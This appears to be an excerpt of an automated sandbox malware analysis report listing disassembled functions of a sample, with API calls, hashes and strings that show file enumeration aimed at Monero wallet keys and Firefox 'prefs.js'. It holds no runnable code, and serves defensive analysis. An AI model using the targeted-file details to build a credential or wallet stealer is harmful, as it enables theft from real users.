                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$%s\%s$%s\*
                      • API String ID: 180737720-445461498
                      • Opcode ID: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                      • Instruction ID: 88271e41953303d751eedc97ec8f5d0b307ef1151e849d075bb1108da632243e
                      • Opcode Fuzzy Hash: 1aaf400b2273b4065d7d710ed087df150013bee714acd782618ae1de795e9bf1
                      • Instruction Fuzzy Hash: A06185B2900218ABCB24EBA0DD49FEE737CBB58700F04859DF509A6141EB71EB95CF95
                      Function 001D4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                      • wsprintfA.USER32 ref: 001D45A6
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                      • StrCmpCA.SHLWAPI(?,001E0FC4), ref: 001D45EB
                      • StrCmpCA.SHLWAPI(?,001E0FC8), ref: 001D4601
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D468B
                      • FindClose.KERNEL32(000000FF), ref: 001D46A0
                      • lstrcat.KERNEL32(?,00E3EAB8), ref: 001D46C5
                      • lstrcat.KERNEL32(?,00E3DA40), ref: 001D46D8
                      • lstrlen.KERNEL32(?), ref: 001D46E5
                      • lstrlen.KERNEL32(?), ref: 001D46F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                      • String ID: %s\%s$%s\*
                      • API String ID: 671575355-2848263008
                      • Opcode ID: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                      • Instruction ID: c5f856407e258a052ae2599d85dd7bb0ee5b80aaa465ded0801dd50d23996156
                      • Opcode Fuzzy Hash: 2ecf64059963630326f3d8d1be13675cb67a6154dbf1603a9cfda91fdeb91f2e
                      • Instruction Fuzzy Hash: DC5187B6540318ABCB24FB70DD89FED737CAB58300F404599F649A2150EB74DB948F96
                      Function 001D3EA0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 133fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 001D3EC3
                      • FindFirstFileA.KERNEL32(?,?), ref: 001D3EDA
                      • StrCmpCA.SHLWAPI(?,001E0FAC), ref: 001D3F08
                      • StrCmpCA.SHLWAPI(?,001E0FB0), ref: 001D3F1E
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001D406C
                      • FindClose.KERNEL32(000000FF), ref: 001D4081
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\%s$h
                      • API String ID: 180737720-3418665255
                      • Opcode ID: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                      • Instruction ID: 36d819330a3fe5cbfa67e1748d38e914d685f96889a106bcc56d42a74520b081
                      • Opcode Fuzzy Hash: 8929d80d2bf58d2e1bf5e8093fa19bff467f998867212a4c16676e300cba3532
                      • Instruction Fuzzy Hash: D05196B6900318ABCB24FBB0DD85EEE737CBB58300F008599B659A2140DB75DB958F95
                      Function 001CED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                      Download Yara Rule
                      APIs
                      • wsprintfA.USER32 ref: 001CED3E
                      • FindFirstFileA.KERNEL32(?,?), ref: 001CED55
                      • StrCmpCA.SHLWAPI(?,001E1538), ref: 001CEDAB
                      • StrCmpCA.SHLWAPI(?,001E153C), ref: 001CEDC1
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CF2AE
                      • FindClose.KERNEL32(000000FF), ref: 001CF2C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextwsprintf
                      • String ID: %s\*.*
                      • API String ID: 180737720-1013718255
                      • Opcode ID: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                      • Instruction ID: dc9e6e05c8c4ab6709d725fe156828a66ad3b960af8feb026d6509c95f429fcb
                      • Opcode Fuzzy Hash: 8d687ff4be9061345a33a43469a9d63b62a70fe7df2096d34d3b24de0beeb19a
                      • Instruction Fuzzy Hash: 35E1F6719111589ADB58FB60CC92EEE733CAF74301F8041EAB40A62152EF306F8ADF56
                      Function 001CF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E15B8,001E0D96), ref: 001CF71E
                      • StrCmpCA.SHLWAPI(?,001E15BC), ref: 001CF76F
                      • StrCmpCA.SHLWAPI(?,001E15C0), ref: 001CF785
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CFAB1
                      • FindClose.KERNEL32(000000FF), ref: 001CFAC3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: prefs.js
                      • API String ID: 3334442632-3783873740
                      • Opcode ID: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                      • Instruction ID: a98f52f0f966995bf1ddefe405e60afa24da86f27c215506d3ab1f3b4b008df2
                      • Opcode Fuzzy Hash: 1df9f25bfe117f878832f95d010fb94f5fa2565fa8889998fec58aef569bd07f
                      • Instruction Fuzzy Hash: D9B145719002549BCB24FF64DC95FEE7379AF64300F8085ADA80A97251EF319B4ACF96
                      Function 00596031 Relevance: 15.5, Strings: 11, Instructions: 1706COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: D=Xw$X[=$Z=$a~$cwg$g^wO$wA/$xnC$V~o$e7/$zy
                      • API String ID: 0-3030764929
                      • Opcode ID: 152fe010d69f4655c8bd94256e98664688d1f2ed624a69a33027ca8a6e6543d6
                      • Instruction ID: 56759293292a1e1c35a89334c596a7f7a2a95cd1bfbda0ab826b25a731d84210
                      • Opcode Fuzzy Hash: 152fe010d69f4655c8bd94256e98664688d1f2ed624a69a33027ca8a6e6543d6
                      • Instruction Fuzzy Hash: B9B24BF36082049FE3046E2DEC8567AFBD9EFD4320F16863DEAC5C7744E93598058696
                      Function 001C16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E510C,?,?,?,001E51B4,?,?,00000000,?,00000000), ref: 001C1923
                      • StrCmpCA.SHLWAPI(?,001E525C), ref: 001C1973
                      • StrCmpCA.SHLWAPI(?,001E5304), ref: 001C1989
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001C1D40
                      • DeleteFileA.KERNEL32(00000000), ref: 001C1DCA
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001C1E20
                      • FindClose.KERNEL32(000000FF), ref: 001C1E32
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                      • String ID: \*.*
                      • API String ID: 1415058207-1173974218
                      • Opcode ID: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                      • Instruction ID: 964470a5bacf9d5b5ac160f75110b0ab6e98accd27796b69f8b457517cde5eea
                      • Opcode Fuzzy Hash: 4499aae7d39a0aad838535cfed8a3ed324d856b492386231e076b942e76157a1
                      • Instruction Fuzzy Hash: 121247719501589BCB19FB60CCA6EEE7378AF74301FC0419AB50A62291EF306F89DF95
                      Function 001CDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001E0C2E), ref: 001CDE5E
                      • StrCmpCA.SHLWAPI(?,001E14C8), ref: 001CDEAE
                      • StrCmpCA.SHLWAPI(?,001E14CC), ref: 001CDEC4
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CE3E0
                      • FindClose.KERNEL32(000000FF), ref: 001CE3F2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                      • String ID: \*.*
                      • API String ID: 2325840235-1173974218
                      • Opcode ID: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                      • Instruction ID: 1124ace908988f3ddda8beda2e519476f274363886babafd1453db047a3f1229
                      • Opcode Fuzzy Hash: cd28f9198bd80aded5ac6bec978e009426e997b3873533ab4f3556e7a22c67e1
                      • Instruction Fuzzy Hash: 10F1A0718501689ADB19EB60DCA5EEE7378BF34301FC041EAB40A62191EF306F89DF56
                      Function 001CDA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001E14B0,001E0C2A), ref: 001CDAEB
                      • StrCmpCA.SHLWAPI(?,001E14B4), ref: 001CDB33
                      • StrCmpCA.SHLWAPI(?,001E14B8), ref: 001CDB49
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 001CDDCC
                      • FindClose.KERNEL32(000000FF), ref: 001CDDDE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID:
                      • API String ID: 3334442632-0
                      • Opcode ID: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                      • Instruction ID: a1baeaa42b66428280e1088d4dd914331f0b56d7d90f903befbd9d5f98b4583b
                      • Opcode Fuzzy Hash: b4287a481f0c5099730c3f110a3235b3e57d39f48514e55985c8b86f1467d97b
                      • Instruction Fuzzy Hash: 0B914872900104A7CB14FBB0ED56EED737DAFA4300F808569F90A96281EF35DB19CB96
                      Function 00599590 Relevance: 12.9, Strings: 9, Instructions: 1634COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
